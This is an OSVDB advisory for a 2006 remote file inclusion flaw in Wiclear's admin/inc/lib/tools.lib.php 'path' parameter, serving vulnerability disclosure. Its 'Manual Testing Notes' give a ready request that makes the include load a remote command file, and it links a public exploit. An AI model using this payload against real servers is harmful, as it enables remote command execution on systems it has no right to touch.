Wiclear admin/inc/lib/tools.lib.php path Variable Remote File Inclusion

2006-10-23T08:18:49
ID OSVDB:29944
Type osvdb
Reporter The Master()
Modified 2006-10-23T08:18:49

Description

Vulnerability Description

Wiclear contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/inc/lib/tools.lib.php not properly sanitizing user input supplied to the 'path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Wiclear contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/inc/lib/tools.lib.php not properly sanitizing user input supplied to the 'path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[Path]/admin/inc/lib/tools.lib.php?path=http://cmd.gif?

References:

Vendor URL: http://wiclear.free.fr/ Secunia Advisory ID:22547 Related OSVDB ID: 29945 Related OSVDB ID: 29948 Related OSVDB ID: 29943 Related OSVDB ID: 29946 Related OSVDB ID: 29947 Related OSVDB ID: 29942 Related OSVDB ID: 29949 Generic Exploit URL: http://milw0rm.com/exploits/2624 CVE-2006-5506